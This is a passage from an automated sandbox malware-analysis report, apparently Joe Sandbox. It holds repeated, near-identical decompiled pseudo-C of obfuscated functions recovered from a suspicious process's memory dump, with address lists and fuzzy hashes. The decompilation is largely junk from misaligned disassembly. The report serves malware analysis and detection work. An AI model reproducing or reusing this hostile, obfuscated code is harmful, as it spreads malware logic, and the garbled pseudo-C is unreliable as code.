					_t72 = _t71 + 0xf4eb4097;
					asm("movsd");
					_t140 = 0x9a;
					_t56 = E00401277(_t72, _t137, _t150, _t153, _t156, _t168);
					asm("salc");
					asm("fcom dword [esi+0x6b]");
					_t160 = 0x10eba4a4 |  *(_t153 + 0xffffffff8543585e);
				}
				asm("sahf");
				asm("cmpsb");
				asm("movsb");
				asm("movsb");
				asm("ficomp word [ebx+0x5a39df54]");
				asm("salc");
				_t161 = _t160 |  *(_t153 + _t156 - 0x590a4c55);
				asm("movsb");
				asm("movsb");
				asm("ficomp word [ebx+0x5a10df54]");
				asm("movsb");
				asm("cs cmpsd");
				_push(_t161);
				asm("fisub word [eax+0x5a]");
				asm("salc");
				_t183 = (_t181 - _t146[0x1a]) *  *_t146;
				asm("movsb");
				asm("scasd");
				asm("cmpsb");
				asm("movsb");
				asm("movsb");
				asm("ficomp word [ebx+0x5a7fdf54]");
				do {
					_pop(_t147);
					asm("salc");
					_t183 = _t183 +  *_t153;
					asm("movsb");
					 *[cs:0xa4a62bb3] = _t56;
					asm("movsb");
					asm("ficomp word [ebx+0x5a56df54]");
					_t56 = 0x49;
					_t148 = _t147 ^  *0xd05b5b70;
				} while ((_t147 ^  *0xd05b5b70) > 0);
				asm("lahf");
				_pop(_t152);
				asm("fst qword [eax-0x4f074b50]");
				_push(_t153);
				_t174 = _t140 + 1;
				asm("adc dh, [eax-0x2b4c1752]");
				_push(ss);
				gs =  *0x0000007A;
				_push(0x2c1c);
				_t59 =  *_t161;
				asm("adc ch, [edi-0x40]");
				_push(0xab);
				E00401277(_t59, 0x688e1679, _t152, _t153, 0x13eba4a4, _t174);
				_push( *0x13EBA4A0);
				E004019D4();
				_push(0x688e46de);
				_push( *((intOrPtr*)(0x13eba4a0)));
				_t62 = E004025E8(_t152, _t153, _t174); // executed
				_t175 = _t62;
				if(_t62 != 0) {
					if(E00401F34(_t152, _t175,  *((intOrPtr*)(0x13eba4a0))) != 0) {
						L26:
						_t180 = gs;
						if(gs != 0) {
							_t65 = 0x688e6ab7;
							_t143 = 0x2ef8;
						} else {
							_t65 = 0x688e471e;
							_t143 = 0x2399;
						}
						_push( *0x688E99AF);
						_push(_t143);
						_push(_t65);
						_push( *((intOrPtr*)(0x13eba4a0)));
						E0040193B(_t148, _t180);
						_t67 = 0x2c1c;
						_t62 = E00401277(_t67, 0x688e1679, _t152, _t153, 0x13eba4a4, _t180);
					} else {
						_t62 = E00402255(_t183,  *((intOrPtr*)(0x13eba4a0)));
						_t177 = _t62;
						if(_t62 != 0) {
							_push( *((intOrPtr*)(0x13eba4a0)));
							_t62 = L00402321(0x688e1679, _t152, _t153, _t177, _t183);
							_t178 = _t62;
							if(_t62 != 0) {
								_t62 = E00401FF1(_t178, _t183,  *((intOrPtr*)(0x13eba4a0)));
								if(_t62 != 0) {
									goto L26;
								}
							}
						}
					}
				}
				return _t62;
			}

0x00402a07
0x00402a07
0x00402a07
0x00402a07
0x00402a0b
0x00402a0f
0x00402a16
0x00402a17
0x00402a18
0x00402a1a
0x00402a1f
0x00402a20
0x00402a21
0x00402a22
0x00402a2c
0x00402a2d
0x00402a36
0x00402a39
0x00402a3a
0x00402a3a
0x00402a3a
0x00402a40
0x00402a44
0x00402a45
0x00402a47
0x00402a4a
0x00402a50
0x00402a52
0x00402a57
0x00402a58
0x00402a73
0x00402a7f
0x00402a88
0x00402a89
0x00402a8c
0x00402a8d
0x00402a93
0x00402a9b
0x00402a9d
0x00402aa0
0x00402aa1
0x00402ac5
0x00402ac7
0x00402ad7
0x00402ad9
0x00402ada
0x00402adb
0x00402ae0
0x00402ae5
0x00402ae6
0x00402ae7
0x00402aed
0x00402af3
0x00402af4
0x00402af7
0x00402af9
0x00402afb
0x00402afc
0x00402b02
0x00402b03
0x00402b06
0x00402b08
0x00402b09
0x00402b0f
0x00402b12
0x00402b23
0x00402b24
0x00402b25
0x00402b2b
0x00402b2d
0x00402b30
0x00402b35
0x00402b3d
0x00402b49
0x00402b4e
0x00402b4f
0x00402b54
0x00402b54
0x00402b59
0x00402b5a
0x00402b5b
0x00402b5c
0x00402b5d
0x00402b65
0x00402b6b
0x00402b72
0x00402b73
0x00402b74
0x00402b7c
0x00402b7d
0x00402b86
0x00402b87
0x00402b8c
0x00402b8d
0x00402b93
0x00402b94
0x00402b98
0x00402b99
0x00402b9a
0x00402b9b
0x00402ba0
0x00402ba0
0x00402ba3
0x00402ba4
0x00402baa
0x00402bab
0x00402bb1
0x00402bb2
0x00402bba
0x00402bbf
0x00402bc5
0x00402bc8
0x00402bc9
0x00402bcc
0x00402bd2
0x00402bde
0x00402bdf
0x00402bec
0x00402bed
0x00402bee
0x00402bf3
0x00402c01
0x00402c05
0x00402c17
0x00402c1c
0x00402c1f
0x00402c2a
0x00402c2b
0x00402c2e
0x00402c33
0x00402c35
0x00402c45
0x00402c6b
0x00402c6e
0x00402c71
0x00402c80
0x00402c86
0x00402c73
0x00402c73
0x00402c79
0x00402c79
0x00402c8b
0x00402c91
0x00402c92
0x00402c93
0x00402c96
0x00402ca7
0x00402cc2
0x00402c47
0x00402c4a
0x00402c4f
0x00402c51
0x00402c53
0x00402c56
0x00402c5b
0x00402c5d
0x00402c62
0x00402c69
0x00000000
0x00000000
0x00402c69
0x00402c5d
0x00402c51
0x00402c45
0x00402cc8

Memory Dump Source

Source File: 0000000E.00000002.807014174.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_D984.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b045a89dc38c056c7d7352abef0b4b2f573bda20b5254fa9f7f2cee09e6065b
Instruction ID: 28c32271fa903d2e502f5c43ee7f2935ae1d22089060b7f4ec41985c8baa115a
Opcode Fuzzy Hash: 3b045a89dc38c056c7d7352abef0b4b2f573bda20b5254fa9f7f2cee09e6065b
Instruction Fuzzy Hash: A6717732109101DFEB00AE64EECA59AFB64FF1937477001ABDC416F1E2C37B5542DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 00402A5E, Relevance: .2, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 33%

			E00402A5E(void* __ebx, void* __ecx, signed int* __edx, void* __edi, intOrPtr* __esi, void* __eflags, void* __fp0) {
				void* _t42;
				signed int _t45;
				void* _t48;
				void* _t51;
				void* _t54;
				void* _t56;
				void* _t60;
				void* _t61;
				void* _t66;
				void* _t67;
				void* _t72;
				void* _t73;
				signed int _t90;
				signed int* _t113;
				void* _t118;
				void* _t123;
				void* _t126;
				signed int* _t128;
				signed int _t129;
				void* _t131;
				signed int _t132;
				void* _t134;
				intOrPtr* _t135;
				void* _t136;
				void* _t140;
				signed int _t141;
				signed int _t142;
				void* _t155;
				void* _t162;
				signed long long _t164;

				_t162 = __fp0;
				_t135 = __esi;
				_t131 = __edi;
				_t128 = __edx;
				asm("sbb al, 0xb8");
				_t123 = 0x9d;
				_t42 = E00401277(0x2a84, __ebx, __edi, __esi, _t136, __eflags);
				_pop(_t66);
				 *(_t66 + 0x3e) =  *(_t66 + 0x3e) ^ 0x00000012;
				_pop(_t67);
				 *((intOrPtr*)(_t67 + 0x35)) =  *((intOrPtr*)(_t67 + 0x35)) - _t67;
				asm("aaa");
				_t72 = 0x5b5b695b;
				 *((intOrPtr*)(_t72 + 0x3e)) =  *((intOrPtr*)(_t72 + 0x3e)) - 0x12;
				_pop(_t73);
				 *((intOrPtr*)(_t73 + 0x68)) =  *((intOrPtr*)(_t73 + 0x68)) - _t73;
				asm("aaa");
				asm("aaa");
				_t90 = 0x5b5b695b;
				asm("das");
				_t141 = _t140 - 1;
				_t45 = _t42 - 0x2b5b3a5b + 0xdbb726d6 | 0xb3a72ea4;
				_t137 = 0xdea4a4a7;
				asm("wait");
				_push(_t141);
				asm("fild word [eax-0xfa4a4a6]");
				asm("fcomp dword [ebp-0x4f404fb7]");
				_push(_t135);
				_t132 = _t131 -  *0xFFFFFFFFDEA4A4EF;
				_t149 = _t90 ^ _t132;
				if((_t90 ^ _t132) < 0) {
					_pop(_t113);
					_t135 = _t135 +  *((intOrPtr*)(_t45 - 0x4fd534a2));
					asm("scasd");
					asm("salc");
					_t137 = 0xdea4a4a7 - _t132;
					asm("int3");
					 *_t113 =  *_t113 ^ 0xffffffc6;
					asm("rcl byte [edi+0x7f], 1");
					asm("fcomp dword [edi-0x33a14fa1]");
					_t118 = 0xffffffb0;
					asm("movsd");
					asm("clc");
					_t60 = 0xffffffffb19799b2 -  *((intOrPtr*)(0xffffffffb19799b2));
					 *((intOrPtr*)(_t60 - 0x15)) =  *((intOrPtr*)(_t60 - 0x15)) + _t118;
					_t61 = _t60 + 0xf4eb4097;
					asm("movsd");
					_t123 = 0x9a;
					_t45 = E00401277(_t61, _t118, _t132, _t135, _t137, _t149);
					asm("salc");
					asm("fcom dword [esi+0x6b]");
					_t141 = 0x10eba4a4 |  *(_t135 + 0xffffffff8543585e);
				}
				asm("sahf");
				asm("cmpsb");
				asm("movsb");
				asm("movsb");
				asm("ficomp word [ebx+0x5a39df54]");
				asm("salc");
				_t142 = _t141 |  *(_t135 + _t137 - 0x590a4c55);
				asm("movsb");
				asm("movsb");
				asm("ficomp word [ebx+0x5a10df54]");
				asm("movsb");
				asm("cs cmpsd");
				_push(_t142);
				asm("fisub word [eax+0x5a]");
				asm("salc");
				_t164 = (_t162 - _t128[0x1a]) *  *_t128;
				asm("movsb");
				asm("scasd");
				asm("cmpsb");
				asm("movsb");
				asm("movsb");
				asm("ficomp word [ebx+0x5a7fdf54]");
				do {
					_pop(_t129);
					asm("salc");
					_t164 = _t164 +  *_t135;
					asm("movsb");
					 *[cs:0xa4a62bb3] = _t45;
					asm("movsb");
					asm("ficomp word [ebx+0x5a56df54]");
					_t45 = 0x49;
					_t130 = _t129 ^  *0xd05b5b70;
				} while ((_t129 ^  *0xd05b5b70) > 0);
				asm("lahf");
				_pop(_t134);
				asm("fst qword [eax-0x4f074b50]");
				_push(_t135);
				_t155 = _t123 + 1;
				asm("adc dh, [eax-0x2b4c1752]");
				_push(ss);
				gs =  *0x0000007A;
				_push(0x2c1c);
				_t48 =  *_t142;
				asm("adc ch, [edi-0x40]");
				_push(0xab);
				E00401277(_t48, 0x688e1679, _t134, _t135, 0x13eba4a4, _t155);
				_push( *0x13EBA4A0);
				E004019D4();
				_push(0x688e46de);
				_push( *((intOrPtr*)(0x13eba4a0)));
				_t51 = E004025E8(_t134, _t135, _t155); // executed
				_t156 = _t51;
				if(_t51 != 0) {
					if(E00401F34(_t134, _t156,  *((intOrPtr*)(0x13eba4a0))) != 0) {
						L24:
						_t161 = gs;
						if(gs != 0) {
							_t54 = 0x688e6ab7;
							_t126 = 0x2ef8;
						} else {
							_t54 = 0x688e471e;
							_t126 = 0x2399;
						}
						_push( *0x688E99AF);
						_push(_t126);
						_push(_t54);
						_push( *((intOrPtr*)(0x13eba4a0)));
						E0040193B(_t130, _t161);
						_t56 = 0x2c1c;
						_t51 = E00401277(_t56, 0x688e1679, _t134, _t135, 0x13eba4a4, _t161);
					} else {
						_t51 = E00402255(_t164,  *((intOrPtr*)(0x13eba4a0)));
						_t158 = _t51;
						if(_t51 != 0) {
							_push( *((intOrPtr*)(0x13eba4a0)));
							_t51 = L00402321(0x688e1679, _t134, _t135, _t158, _t164);
							_t159 = _t51;
							if(_t51 != 0) {
								_t51 = E00401FF1(_t159, _t164,  *((intOrPtr*)(0x13eba4a0)));
								if(_t51 != 0) {
									goto L24;
								}
							}
						}
					}
				}
				return _t51;
			}

0x00402a5e
0x00402a5e
0x00402a5e
0x00402a5e
0x00402a60
0x00402a73
0x00402a7f
0x00402a88
0x00402a89
0x00402a8c
0x00402a8d
0x00402a93
0x00402a9b
0x00402a9d
0x00402aa0
0x00402aa1
0x00402ac5
0x00402ac7
0x00402ad7
0x00402ad9
0x00402ada
0x00402adb
0x00402ae0
0x00402ae5
0x00402ae6
0x00402ae7
0x00402aed
0x00402af3
0x00402af4
0x00402af7
0x00402af9
0x00402afb
0x00402afc
0x00402b02
0x00402b03
0x00402b06
0x00402b08
0x00402b09
0x00402b0f
0x00402b12
0x00402b23
0x00402b24
0x00402b25
0x00402b2b
0x00402b2d
0x00402b30
0x00402b35
0x00402b3d
0x00402b49
0x00402b4e
0x00402b4f
0x00402b54
0x00402b54
0x00402b59
0x00402b5a
0x00402b5b
0x00402b5c
0x00402b5d
0x00402b65
0x00402b6b
0x00402b72
0x00402b73
0x00402b74
0x00402b7c
0x00402b7d
0x00402b86
0x00402b87
0x00402b8c
0x00402b8d
0x00402b93
0x00402b94
0x00402b98
0x00402b99
0x00402b9a
0x00402b9b
0x00402ba0
0x00402ba0
0x00402ba3
0x00402ba4
0x00402baa
0x00402bab
0x00402bb1
0x00402bb2
0x00402bba
0x00402bbf
0x00402bc5
0x00402bc8
0x00402bc9
0x00402bcc
0x00402bd2
0x00402bde
0x00402bdf
0x00402bec
0x00402bed
0x00402bee
0x00402bf3
0x00402c01
0x00402c05
0x00402c17
0x00402c1c
0x00402c1f
0x00402c2a
0x00402c2b
0x00402c2e
0x00402c33
0x00402c35
0x00402c45
0x00402c6b
0x00402c6e
0x00402c71
0x00402c80
0x00402c86
0x00402c73
0x00402c73
0x00402c79
0x00402c79
0x00402c8b
0x00402c91
0x00402c92
0x00402c93
0x00402c96
0x00402ca7
0x00402cc2
0x00402c47
0x00402c4a
0x00402c4f
0x00402c51
0x00402c53
0x00402c56
0x00402c5b
0x00402c5d
0x00402c62
0x00402c69
0x00000000
0x00000000
0x00402c69
0x00402c5d
0x00402c51
0x00402c45
0x00402cc8

Memory Dump Source

Source File: 0000000E.00000002.807014174.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_D984.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9af5754aaf439908cbc9e538bbe29f54eba11fad21307c3261ecff9ebfcf9c97
Instruction ID: 14214452042e6ecbc914254f67d2709232b961f867d8ebf06c643147f3da40d9
Opcode Fuzzy Hash: 9af5754aaf439908cbc9e538bbe29f54eba11fad21307c3261ecff9ebfcf9c97
Instruction Fuzzy Hash: 5151443200D141DEEB00AE64AEDA5AAFB64FF15378B3001B7DC416E1E6C37A5646DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 00402A68, Relevance: .2, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 33%

			E00402A68(void* __ebx, void* __edi, intOrPtr* __esi, void* __eflags, void* __fp0) {
				void* _t42;
				signed int _t45;
				void* _t48;
				void* _t51;
				void* _t54;
				void* _t56;
				void* _t60;
				void* _t61;
				void* _t66;
				void* _t67;
				void* _t72;
				void* _t73;
				signed int _t90;
				signed int* _t113;
				void* _t118;
				void* _t121;
				void* _t124;
				signed int _t127;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t133;
				void* _t134;
				void* _t138;
				signed int _t139;
				signed int _t140;
				void* _t153;
				void* _t160;
				signed long long _t162;

				_t160 = __fp0;
				_t133 = __esi;
				_t129 = __edi;
				_t121 = 0x9d;
				_t42 = E00401277(0x2a84, __ebx, __edi, __esi, _t134, __eflags);
				_pop(_t66);
				 *(_t66 + 0x3e) =  *(_t66 + 0x3e) ^ 0x00000012;
				_pop(_t67);
				 *((intOrPtr*)(_t67 + 0x35)) =  *((intOrPtr*)(_t67 + 0x35)) - _t67;
				asm("aaa");
				_t72 = 0x5b5b695b;
				 *((intOrPtr*)(_t72 + 0x3e)) =  *((intOrPtr*)(_t72 + 0x3e)) - 0x12;
				_pop(_t73);
				 *((intOrPtr*)(_t73 + 0x68)) =  *((intOrPtr*)(_t73 + 0x68)) - _t73;
				asm("aaa");
				asm("aaa");
				_t90 = 0x5b5b695b;
				asm("das");
				_t139 = _t138 - 1;
				_t45 = _t42 - 0x2b5b3a5b + 0xdbb726d6 | 0xb3a72ea4;
				_t135 = 0xdea4a4a7;
				asm("wait");
				_push(_t139);
				asm("fild word [eax-0xfa4a4a6]");
				asm("fcomp dword [ebp-0x4f404fb7]");
				_push(_t133);
				_t130 = _t129 -  *0xFFFFFFFFDEA4A4EF;
				_t147 = _t90 ^ _t130;
				if((_t90 ^ _t130) < 0) {
					_pop(_t113);
					_t133 = _t133 +  *((intOrPtr*)(_t45 - 0x4fd534a2));
					asm("scasd");
					asm("salc");
					_t135 = 0xdea4a4a7 - _t130;
					asm("int3");
					 *_t113 =  *_t113 ^ 0xffffffc6;
					asm("rcl byte [edi+0x7f], 1");
					asm("fcomp dword [edi-0x33a14fa1]");
					_t118 = 0xffffffb0;
					asm("movsd");
					asm("clc");
					_t60 = 0xffffffffb19799b2 -  *((intOrPtr*)(0xffffffffb19799b2));
					 *((intOrPtr*)(_t60 - 0x15)) =  *((intOrPtr*)(_t60 - 0x15)) + _t118;
					_t61 = _t60 + 0xf4eb4097;
					asm("movsd");
					_t121 = 0x9a;
					_t45 = E00401277(_t61, _t118, _t130, _t133, _t135, _t147);
					asm("salc");
					asm("fcom dword [esi+0x6b]");
					_t139 = 0x10eba4a4 |  *(_t133 + 0xffffffff8543585e);
				}
				asm("sahf");
				asm("cmpsb");
				asm("movsb");
				asm("movsb");
				asm("ficomp word [ebx+0x5a39df54]");
				asm("salc");
				_t140 = _t139 |  *(_t133 + _t135 - 0x590a4c55);
				asm("movsb");
				asm("movsb");
				asm("ficomp word [ebx+0x5a10df54]");
				asm("movsb");
				asm("cs cmpsd");
				_push(_t140);
				asm("fisub word [eax+0x5a]");
				asm("salc");
				_t162 = (_t160 -  *0x000000F7) *  *0x8c;
				asm("movsb");
				asm("scasd");
				asm("cmpsb");
				asm("movsb");
				asm("movsb");
				asm("ficomp word [ebx+0x5a7fdf54]");
				do {
					_pop(_t127);
					asm("salc");
					_t162 = _t162 +  *_t133;
					asm("movsb");
					 *[cs:0xa4a62bb3] = _t45;
					asm("movsb");
					asm("ficomp word [ebx+0x5a56df54]");
					_t45 = 0x49;
					_t128 = _t127 ^  *0xd05b5b70;
				} while ((_t127 ^  *0xd05b5b70) > 0);
				asm("lahf");
				_pop(_t132);
				asm("fst qword [eax-0x4f074b50]");
				_push(_t133);
				_t153 = _t121 + 1;
				asm("adc dh, [eax-0x2b4c1752]");
				_push(ss);
				gs =  *0x0000007A;
				_push(0x2c1c);
				_t48 =  *_t140;
				asm("adc ch, [edi-0x40]");
				_push(0xab);
				E00401277(_t48, 0x688e1679, _t132, _t133, 0x13eba4a4, _t153);
				_push( *0x13EBA4A0);
				E004019D4();
				_push(0x688e46de);
				_push( *((intOrPtr*)(0x13eba4a0)));
				_t51 = E004025E8(_t132, _t133, _t153); // executed
				_t154 = _t51;
				if(_t51 != 0) {
					if(E00401F34(_t132, _t154,  *((intOrPtr*)(0x13eba4a0))) != 0) {
						L25:
						_t159 = gs;
						if(gs != 0) {
							_t54 = 0x688e6ab7;
							_t124 = 0x2ef8;
						} else {
							_t54 = 0x688e471e;
							_t124 = 0x2399;
						}
						_push( *0x688E99AF);
						_push(_t124);
						_push(_t54);
						_push( *((intOrPtr*)(0x13eba4a0)));
						E0040193B(_t128, _t159);
						_t56 = 0x2c1c;
						_t51 = E00401277(_t56, 0x688e1679, _t132, _t133, 0x13eba4a4, _t159);
					} else {
						_t51 = E00402255(_t162,  *((intOrPtr*)(0x13eba4a0)));
						_t156 = _t51;
						if(_t51 != 0) {
							_push( *((intOrPtr*)(0x13eba4a0)));
							_t51 = L00402321(0x688e1679, _t132, _t133, _t156, _t162);
							_t157 = _t51;
							if(_t51 != 0) {
								_t51 = E00401FF1(_t157, _t162,  *((intOrPtr*)(0x13eba4a0)));
								if(_t51 != 0) {
									goto L25;
								}
							}
						}
					}
				}
				return _t51;
			}

0x00402a68
0x00402a68
0x00402a68
0x00402a73
0x00402a7f
0x00402a88
0x00402a89
0x00402a8c
0x00402a8d
0x00402a93
0x00402a9b
0x00402a9d
0x00402aa0
0x00402aa1
0x00402ac5
0x00402ac7
0x00402ad7
0x00402ad9
0x00402ada
0x00402adb
0x00402ae0
0x00402ae5
0x00402ae6
0x00402ae7
0x00402aed
0x00402af3
0x00402af4
0x00402af7
0x00402af9
0x00402afb
0x00402afc
0x00402b02
0x00402b03
0x00402b06
0x00402b08
0x00402b09
0x00402b0f
0x00402b12
0x00402b23
0x00402b24
0x00402b25
0x00402b2b
0x00402b2d
0x00402b30
0x00402b35
0x00402b3d
0x00402b49
0x00402b4e
0x00402b4f
0x00402b54
0x00402b54
0x00402b59
0x00402b5a
0x00402b5b
0x00402b5c
0x00402b5d
0x00402b65
0x00402b6b
0x00402b72
0x00402b73
0x00402b74
0x00402b7c
0x00402b7d
0x00402b86
0x00402b87
0x00402b8c
0x00402b8d
0x00402b93
0x00402b94
0x00402b98
0x00402b99
0x00402b9a
0x00402b9b
0x00402ba0
0x00402ba0
0x00402ba3
0x00402ba4
0x00402baa
0x00402bab
0x00402bb1
0x00402bb2
0x00402bba
0x00402bbf
0x00402bc5
0x00402bc8
0x00402bc9
0x00402bcc
0x00402bd2
0x00402bde
0x00402bdf
0x00402bec
0x00402bed
0x00402bee
0x00402bf3
0x00402c01
0x00402c05
0x00402c17
0x00402c1c
0x00402c1f
0x00402c2a
0x00402c2b
0x00402c2e
0x00402c33
0x00402c35
0x00402c45
0x00402c6b
0x00402c6e
0x00402c71
0x00402c80
0x00402c86
0x00402c73
0x00402c73
0x00402c79
0x00402c79
0x00402c8b
0x00402c91
0x00402c92
0x00402c93
0x00402c96
0x00402ca7
0x00402cc2
0x00402c47
0x00402c4a
0x00402c4f
0x00402c51
0x00402c53
0x00402c56
0x00402c5b
0x00402c5d
0x00402c62
0x00402c69
0x00000000
0x00000000
0x00402c69
0x00402c5d
0x00402c51
0x00402c45
0x00402cc8

Memory Dump Source

Source File: 0000000E.00000002.807014174.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_D984.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5ce9d8f38c6a1832c1f617ca6f2b2dbab99815177e54b5282bbfeaab51e76cd
Instruction ID: 82ad2b52174684eab274c82477a3a8af7fb59672a5e0ddff72ba5353dc29b957
Opcode Fuzzy Hash: e5ce9d8f38c6a1832c1f617ca6f2b2dbab99815177e54b5282bbfeaab51e76cd
Instruction Fuzzy Hash: 11514332109101DEEB00AE64AFDA9AAF764FF15378B3001B7DC416E1E6C37B5646DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 00402A6C, Relevance: .2, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 34%

			E00402A6C(unsigned int __ebx, signed int* __edx, void* __edi, intOrPtr* __esi, void* __fp0) {
				void* _t41;
				void* _t42;
				signed int _t45;
				void* _t48;
				void* _t51;
				void* _t54;
				void* _t56;
				void* _t60;
				void* _t61;
				void* _t67;
				void* _t68;
				void* _t73;
				void* _t74;
				signed int _t91;
				signed int* _t114;
				void* _t119;
				void* _t122;
				void* _t125;
				signed int* _t127;
				signed int _t128;
				void* _t130;
				signed int _t131;
				void* _t133;
				intOrPtr* _t134;
				void* _t135;
				void* _t139;
				signed int _t140;
				signed int _t141;
				unsigned int _t146;
				void* _t154;
				void* _t161;
				signed long long _t163;

				_t161 = __fp0;
				_t134 = __esi;
				_t130 = __edi;
				_t127 = __edx;
				_t63 = __ebx >> 0xd;
				_t146 = __ebx >> 0xd;
				_t122 = 0x9d;
				_t42 = E00401277(_t41, _t63, __edi, __esi, _t135, _t146);
				_pop(_t67);
				 *(_t67 + 0x3e) =  *(_t67 + 0x3e) ^ 0x00000012;
				_pop(_t68);
				 *((intOrPtr*)(_t68 + 0x35)) =  *((intOrPtr*)(_t68 + 0x35)) - _t68;
				asm("aaa");
				_t73 = 0x5b5b695b;
				 *((intOrPtr*)(_t73 + 0x3e)) =  *((intOrPtr*)(_t73 + 0x3e)) - 0x12;
				_pop(_t74);
				 *((intOrPtr*)(_t74 + 0x68)) =  *((intOrPtr*)(_t74 + 0x68)) - _t74;
				asm("aaa");
				asm("aaa");
				_t91 = 0x5b5b695b;
				asm("das");
				_t140 = _t139 - 1;
				_t45 = _t42 - 0x2b5b3a5b + 0xdbb726d6 | 0xb3a72ea4;
				_t136 = 0xdea4a4a7;
				asm("wait");
				_push(_t140);
				asm("fild word [eax-0xfa4a4a6]");
				asm("fcomp dword [ebp-0x4f404fb7]");
				_push(_t134);
				_t131 = _t130 -  *0xFFFFFFFFDEA4A4EF;
				_t148 = _t91 ^ _t131;
				if((_t91 ^ _t131) < 0) {
					_pop(_t114);
					_t134 = _t134 +  *((intOrPtr*)(_t45 - 0x4fd534a2));
					asm("scasd");
					asm("salc");
					_t136 = 0xdea4a4a7 - _t131;
					asm("int3");
					 *_t114 =  *_t114 ^ 0xffffffc6;
					asm("rcl byte [edi+0x7f], 1");
					asm("fcomp dword [edi-0x33a14fa1]");
					_t119 = 0xffffffb0;
					asm("movsd");
					asm("clc");
					_t60 = 0xffffffffb19799b2 -  *((intOrPtr*)(0xffffffffb19799b2));
					 *((intOrPtr*)(_t60 - 0x15)) =  *((intOrPtr*)(_t60 - 0x15)) + _t119;
					_t61 = _t60 + 0xf4eb4097;
					asm("movsd");
					_t122 = 0x9a;
					_t45 = E00401277(_t61, _t119, _t131, _t134, _t136, _t148);
					asm("salc");
					asm("fcom dword [esi+0x6b]");
					_t140 = 0x10eba4a4 |  *(_t134 + 0xffffffff8543585e);
				}
				asm("sahf");
				asm("cmpsb");
				asm("movsb");
				asm("movsb");
				asm("ficomp word [ebx+0x5a39df54]");
				asm("salc");
				_t141 = _t140 |  *(_t134 + _t136 - 0x590a4c55);
				asm("movsb");
				asm("movsb");
				asm("ficomp word [ebx+0x5a10df54]");
				asm("movsb");
				asm("cs cmpsd");
				_push(_t141);
				asm("fisub word [eax+0x5a]");
				asm("salc");
				_t163 = (_t161 - _t127[0x1a]) *  *_t127;
				asm("movsb");
				asm("scasd");
				asm("cmpsb");
				asm("movsb");
				asm("movsb");
				asm("ficomp word [ebx+0x5a7fdf54]");
				do {
					_pop(_t128);
					asm("salc");
					_t163 = _t163 +  *_t134;
					asm("movsb");
					 *[cs:0xa4a62bb3] = _t45;
					asm("movsb");
					asm("ficomp word [ebx+0x5a56df54]");
					_t45 = 0x49;
					_t129 = _t128 ^  *0xd05b5b70;
				} while ((_t128 ^  *0xd05b5b70) > 0);
				asm("lahf");
				_pop(_t133);
				asm("fst qword [eax-0x4f074b50]");
				_push(_t134);
				_t154 = _t122 + 1;
				asm("adc dh, [eax-0x2b4c1752]");
				_push(ss);
				gs =  *0x0000007A;
				_push(0x2c1c);
				_t48 =  *_t141;
				asm("adc ch, [edi-0x40]");
				_push(0xab);
				E00401277(_t48, 0x688e1679, _t133, _t134, 0x13eba4a4, _t154);
				_push( *0x13EBA4A0);
				E004019D4();
				_push(0x688e46de);
				_push( *((intOrPtr*)(0x13eba4a0)));
				_t51 = E004025E8(_t133, _t134, _t154); // executed
				_t155 = _t51;
				if(_t51 != 0) {
					if(E00401F34(_t133, _t155,  *((intOrPtr*)(0x13eba4a0))) != 0) {
						L23:
						_t160 = gs;
						if(gs != 0) {
							_t54 = 0x688e6ab7;
							_t125 = 0x2ef8;
						} else {
							_t54 = 0x688e471e;
							_t125 = 0x2399;
						}
						_push( *0x688E99AF);
						_push(_t125);
						_push(_t54);
						_push( *((intOrPtr*)(0x13eba4a0)));
						E0040193B(_t129, _t160);
						_t56 = 0x2c1c;
						_t51 = E00401277(_t56, 0x688e1679, _t133, _t134, 0x13eba4a4, _t160);
					} else {
						_t51 = E00402255(_t163,  *((intOrPtr*)(0x13eba4a0)));
						_t157 = _t51;
						if(_t51 != 0) {
							_push( *((intOrPtr*)(0x13eba4a0)));
							_t51 = L00402321(0x688e1679, _t133, _t134, _t157, _t163);
							_t158 = _t51;
							if(_t51 != 0) {
								_t51 = E00401FF1(_t158, _t163,  *((intOrPtr*)(0x13eba4a0)));
								if(_t51 != 0) {
									goto L23;
								}
							}
						}
					}
				}
				return _t51;
			}

0x00402a6c
0x00402a6c
0x00402a6c
0x00402a6c
0x00402a6c
0x00402a6c
0x00402a73
0x00402a7f
0x00402a88
0x00402a89
0x00402a8c
0x00402a8d
0x00402a93
0x00402a9b
0x00402a9d
0x00402aa0
0x00402aa1
0x00402ac5
0x00402ac7
0x00402ad7
0x00402ad9
0x00402ada
0x00402adb
0x00402ae0
0x00402ae5
0x00402ae6
0x00402ae7
0x00402aed
0x00402af3
0x00402af4
0x00402af7
0x00402af9
0x00402afb
0x00402afc
0x00402b02
0x00402b03
0x00402b06
0x00402b08
0x00402b09
0x00402b0f
0x00402b12
0x00402b23
0x00402b24
0x00402b25
0x00402b2b
0x00402b2d
0x00402b30
0x00402b35
0x00402b3d
0x00402b49
0x00402b4e
0x00402b4f
0x00402b54
0x00402b54
0x00402b59
0x00402b5a
0x00402b5b
0x00402b5c
0x00402b5d
0x00402b65
0x00402b6b
0x00402b72
0x00402b73
0x00402b74
0x00402b7c
0x00402b7d
0x00402b86
0x00402b87
0x00402b8c
0x00402b8d
0x00402b93
0x00402b94
0x00402b98
0x00402b99
0x00402b9a
0x00402b9b
0x00402ba0
0x00402ba0
0x00402ba3
0x00402ba4
0x00402baa
0x00402bab
0x00402bb1
0x00402bb2
0x00402bba
0x00402bbf
0x00402bc5
0x00402bc8
0x00402bc9
0x00402bcc
0x00402bd2
0x00402bde
0x00402bdf
0x00402bec
0x00402bed
0x00402bee
0x00402bf3
0x00402c01
0x00402c05
0x00402c17
0x00402c1c
